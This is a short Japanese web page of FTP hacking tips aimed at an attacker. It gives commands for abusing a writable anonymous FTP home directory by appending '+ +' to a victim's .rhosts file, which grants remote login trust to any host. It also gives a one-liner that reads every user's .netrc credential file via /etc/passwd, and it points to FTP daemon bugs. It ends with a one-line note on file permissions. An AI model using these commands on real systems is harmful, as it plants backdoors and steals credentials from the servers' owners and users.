■FTPのHackのTips
■FTPのアタック方法
ターゲットサーバが匿名(Anonymous)FTPを有効であり、かつ書きこみ可能なディレクトリが存在する場合、Attacker側にとっては嬉しい限りです。
●匿名FTPかつユーザのHOMEディレクトリが書きこみ可能になっていた場合
$ cd /home/victim-user
$ cat >> .rhosts
+ +
^D
また、匿名FTPについては、基礎AnonyFTP講座を参照してください。
●.netrcファイルのリスト化
% cut -d: -f6 /etc/passwd | xargs -i cat { } /.netrc
●FTPdのバグをつく
詳細は、FTP(21)を参照せよ。
■防衛
●パーミッション
FTPに限らないが、パーミッションには気をつけましょう(詳しくは、特別講座<chmod編>を参照せよ)。
■参考文献
|
|||
|
|